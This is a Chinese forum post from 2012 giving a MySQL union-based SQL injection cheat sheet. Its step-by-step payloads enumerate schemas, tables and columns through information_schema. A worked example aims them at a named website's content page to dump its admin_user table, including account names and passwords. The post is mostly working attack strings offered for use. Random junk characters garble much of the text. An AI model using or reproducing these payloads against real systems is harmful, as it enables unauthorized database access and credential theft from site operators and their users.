查库6 ^/ }; W: o! C7 I$ F: [& E9 ~
4 M5 E0 D+ ~7 m3 n; iid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*2 [/ F, E5 E+ c8 E
% `& r+ H; t; D/ [6 u0 Q+ b查表- w9 I0 M' W9 U: g9 p" o
; H1 X8 D5 }, @( e
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,15 c( D; H! p( Z. F
1 i( C" l* Z# c5 G4 @. D查段) L. V; W, R, ^& _( B
/ Z, |+ E( A) t& Y& ^; Pid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
% n* R% E4 Q- m" a5 r: ], u0 r7 o6 b) T' ?3 t' I; A. }
6 A( {+ K3 F9 p3 Z* smysql5高级注入方法暴表
; M) b( B' [, ?9 M; J; q8 E! t5 z: E q% r' E+ g
例子如下:
U% B- ?- M. n5 _6 C
! g3 U* r, y" L8 A8 q( b1.爆表2 F9 n% B! i! { E8 L
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)/ P- g- x* f# O
这样爆到第4个时出现了admin_user表。! r+ H6 l% e) v! A3 m
5 c% z4 d) z# Z, U j) S9 A1 g
2.暴字段
9 Z$ Z$ `' X: j9 Y5 a$ Zhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*4 A, n5 \7 e4 D7 N( B
8 e" j7 X% K% ]) B. b* V: c% ]9 I( ~" ^- _* G4 \! m0 [
3.爆密码
9 c: D' s s0 p, y, D0 Whttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* 6 b& n0 s1 {" V( {8 O; z& C5 m
" Q Z( N+ L2 n/ ~. E' B2 B; r
5 K; ?: E5 s* D p0 X |
发表于 2012-9-13 16:29:37
收藏
支持
反对